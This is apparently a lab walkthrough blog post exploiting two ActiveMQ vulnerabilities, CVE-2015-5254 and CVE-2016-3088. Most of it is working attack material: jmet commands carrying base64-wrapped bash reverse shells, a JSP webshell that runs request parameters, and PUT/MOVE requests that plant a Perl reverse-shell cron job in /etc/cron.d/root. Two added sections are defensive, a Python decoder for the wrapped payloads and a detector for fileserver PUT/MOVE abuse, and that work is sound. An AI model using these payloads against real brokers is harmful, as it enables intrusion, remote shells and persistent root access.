The author is in a bit of a hurry this time, so this post is only a summary; for the detailed walkthrough see the references at the end.
ActiveMQ deserialization vulnerability CVE-2015-5254
Summary: send the payload, then click the message in the admin console to trigger it.
Here are the commands I used:
nmap -sS -T5 -n -p- 192.168.100.23
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.100.23 61616
http://192.168.100.23:8161/admin/browse.jsp?JMSDestination=event
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.100.23 61616
echo "bash -i >& /dev/tcp/192.168.100.23/5555 0>&1" > /tmp/shell.sh && bash /tmp/shell.sh
bash -c {echo,ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy81NTU1IDA+JjEiID4gL3RtcC9zaGVsbC5zaCAmJiBiYXNoIC90bXAvc2hlbGwuc2g=}|{base64,-d}|{bash,-i}
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy81NTU1IDA+JjEiID4gL3RtcC9zaGVsbC5zaCAmJiBiYXNoIC90bXAvc2hlbGwuc2g=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.100.23 61616
1. Command execution: create a file
At this point a queue named event is added to the target ActiveMQ, and all messages in that queue can be viewed at http://192.168.100.23:8161/admin/browse.jsp?JMSDestination=event
2. Reverse shell
I won't include the message-clicking step; here is the resulting reverse shell directly.
3. Command execution of an sh script, then reverse shell
At this point a queue named event is added to the target ActiveMQ, and all messages in that queue can be viewed at http://192.168.100.23:8161/admin/browse.jsp?JMSDestination=event
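As an added triage example (not part of the original post), the helper below unwraps the bash -c {echo,...}|{base64,-d}|{bash,-i} form used in the jmet commands above, so a responder who finds such a string in a captured message body, in the command line of a process spawned by the broker's JVM, or in an EDR alert can recover the plain command and the callback host and port to block and hunt for. The sample inputs are the three -Y payloads from this page; the function names are my own.

```python
"""Unwrap base64-wrapped bash one-liners and pull out reverse-shell callbacks."""
import base64
import re

# The brace-expansion wrapper used by the jmet commands on this page:
# {echo,<base64>}|{base64,-d}|{bash,-i}
BRACE_B64 = re.compile(
    r"\{echo,([A-Za-z0-9+/=]+)\}\s*\|\s*\{base64,-d\}\s*\|\s*\{bash,-i\}"
)
# bash's /dev/tcp/<host>/<port> pseudo-device, the callback used by the shells above
DEV_TCP = re.compile(r"/dev/tcp/([0-9A-Za-z.\-]+)/(\d{1,5})")
# Redirections that drop a file under /tmp (the page's third variant writes /tmp/shell.sh)
TMP_WRITE = re.compile(r">\s*(/tmp/\S+)")

# Constructed sample inputs: the three -Y payloads shown in the commands above.
SAMPLE_COMMANDS = {
    "touch": "touch /tmp/success",
    "shell": "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy80NDQ0IDA+JjE=}"
             "|{base64,-d}|{bash,-i}",
    "script": "bash -c {echo,ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwMC4yMy81NTU1"
              "IDA+JjEiID4gL3RtcC9zaGVsbC5zaCAmJiBiYXNoIC90bXAvc2hlbGwuc2g=}"
              "|{base64,-d}|{bash,-i}",
}


def unwrap_command(cmd: str, max_depth: int = 5) -> str:
    """Return the plain command hidden inside (possibly nested) base64 wrappers.

    Unwrapping repeats up to max_depth layers. Invalid base64 stops the loop and
    the last successfully decoded layer (or the input itself) is returned.
    """
    current = cmd
    for _ in range(max_depth):
        m = BRACE_B64.search(current)
        if not m:
            break
        try:
            # validate=True rejects non-alphabet bytes; binascii.Error is a ValueError
            decoded = base64.b64decode(m.group(1), validate=True)
        except ValueError:
            break
        current = decoded.decode("utf-8", "replace")
    return current


def callback_endpoints(cmd: str) -> list:
    """List (host, port) pairs of /dev/tcp callbacks in an already decoded command."""
    return [(host, int(port)) for host, port in DEV_TCP.findall(cmd)]


def triage(cmd: str) -> dict:
    """Summarise one captured command: decoded form, callbacks and files dropped in /tmp."""
    decoded = unwrap_command(cmd)
    return {
        "wrapped": decoded != cmd,
        "decoded": decoded,
        "callbacks": callback_endpoints(decoded),
        "dropped_files": TMP_WRITE.findall(decoded),
    }


if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMANDS.items():
        print(name, triage(cmd))
```

The callback pairs are the values to feed into egress blocking and flow-log searches; the decoded command itself is what to compare against the broker's expected child processes, since a healthy ActiveMQ JVM has no reason to spawn bash at all.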
ActiveMQ arbitrary file upload vulnerability CVE-2016-3088
1. Write a shell via the fileserver and ActiveMQ's absolute path
MOVE request
MOVE /fileserver/test1.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/test2.jsp
Host: 192.168.100.23:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0
Connection failed
Switch to a different webshell
Here I followed this article: ActiveMQ arbitrary file write vulnerability (CVE-2016-3088)
PS: note that it is best to capture the request by visiting the original page in the browser and then change only the first two lines.
<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>
Success!
2. Write a scheduled task (this method requires ActiveMQ to be running as root; otherwise the cron file cannot be written either.)
This is a fairly robust method. First upload the cron configuration file (note: line endings must be \n, not \r\n, otherwise crontab will fail to run it):
PUT request
PUT /fileserver/1.txt HTTP/1.1
Host: 192.168.100.23:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 249
*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.100.23";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
MOVE request
MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: 192.168.100.23:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0
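Added detection example, not from the original post or from the ActiveMQ project: a small parser that scores raw HTTP requests to the fileserver application for the PUT-then-MOVE pattern used in both methods above, as a reverse proxy, WAF or IDS in front of port 8161 would see them. It assumes the install layout implied by the page's Destination header (/opt/activemq, with the fileserver directory under webapps/fileserver), and the sample requests are constructed from the packets shown above with the headers trimmed and a placeholder cron body.

```python
"""Score raw HTTP requests to the ActiveMQ fileserver for CVE-2016-3088-style abuse."""
import posixpath
from typing import Optional
from urllib.parse import unquote, urlsplit

# Assumed install layout, based on the /opt/activemq prefix in the page's Destination header.
FILESERVER_ROOT = "/opt/activemq/webapps/fileserver"
# Destinations that turn a file write into code execution or persistence.
WEB_EXEC_SUFFIXES = (".jsp", ".jspx", ".jar", ".war")
SENSITIVE_PREFIXES = ("/etc/cron.d", "/etc/crontab", "/var/spool/cron", "/root", "/home")

# Constructed from the requests shown on this page (headers trimmed). The PUT body is a
# placeholder cron line, not the page's payload.
SAMPLE_MOVE_JSP = "\r\n".join([
    "MOVE /fileserver/test1.txt HTTP/1.1",
    "Destination: file:///opt/activemq/webapps/api/test2.jsp",
    "Host: 192.168.100.23:8161",
    "Content-Length: 0",
    "", "",
])
SAMPLE_MOVE_CRON = "\r\n".join([
    "MOVE /fileserver/1.txt HTTP/1.1",
    "Destination: file:///etc/cron.d/root",
    "Host: 192.168.100.23:8161",
    "Content-Length: 0",
    "", "",
])
SAMPLE_PUT_CRON = "\r\n".join([
    "PUT /fileserver/1.txt HTTP/1.1",
    "Host: 192.168.100.23:8161",
    "Content-Length: 35",
    "",
    "*/1 * * * * root /bin/sh /tmp/x.sh\n",
])
SAMPLE_BENIGN = "GET /admin/index.jsp HTTP/1.1\r\nHost: 192.168.100.23:8161\r\n\r\n"


def parse_request(raw: str) -> dict:
    """Split one raw HTTP/1.x request into method, target, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method.upper(), "target": target, "version": version,
            "headers": headers, "body": body}


def resolve_destination(dest: str) -> Optional[str]:
    """Return the normalised filesystem path of a file:// Destination header, else None."""
    parts = urlsplit(dest.strip())
    if parts.scheme.lower() != "file":
        return None
    # normpath collapses ../ so a traversal inside the fileserver directory is still caught
    return posixpath.normpath(unquote(parts.path))


def assess(raw: str) -> dict:
    """Return a severity and the reasons for it; requests not touching /fileserver/ are 'info'."""
    req = parse_request(raw)
    findings, severity = [], "info"
    if req["target"].startswith("/fileserver/"):
        if req["method"] == "PUT":
            severity = "medium"
            findings.append("PUT to fileserver stages attacker-controlled content on disk")
        elif req["method"] == "MOVE":
            severity = "high"
            path = resolve_destination(req["headers"].get("destination", ""))
            if path is None:
                findings.append("MOVE without a file:// Destination")
            else:
                findings.append(f"MOVE relocates staged file to {path}")
                if not (path == FILESERVER_ROOT or path.startswith(FILESERVER_ROOT + "/")):
                    severity = "critical"
                    findings.append("destination escapes the fileserver directory")
                if "/webapps/" in path and path.endswith(WEB_EXEC_SUFFIXES):
                    severity = "critical"
                    findings.append("destination is a server-executable file under webapps")
                if path.startswith(SENSITIVE_PREFIXES):
                    severity = "critical"
                    findings.append("destination is a cron or user account file")
    return {"method": req["method"], "target": req["target"],
            "severity": severity, "findings": findings}


if __name__ == "__main__":
    for raw in (SAMPLE_MOVE_JSP, SAMPLE_MOVE_CRON, SAMPLE_PUT_CRON, SAMPLE_BENIGN):
        print(assess(raw))
```

Correlate a MOVE finding with the preceding PUT from the same client to confirm staging; a Destination outside the fileserver directory has no legitimate use. On ActiveMQ 5.14.0 and later the fileserver application is no longer deployed by default, so on such a broker any request to /fileserver/ is itself worth an alert.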
3. Write jetty.xml or a jar
See the original article; that part is all theory and principles.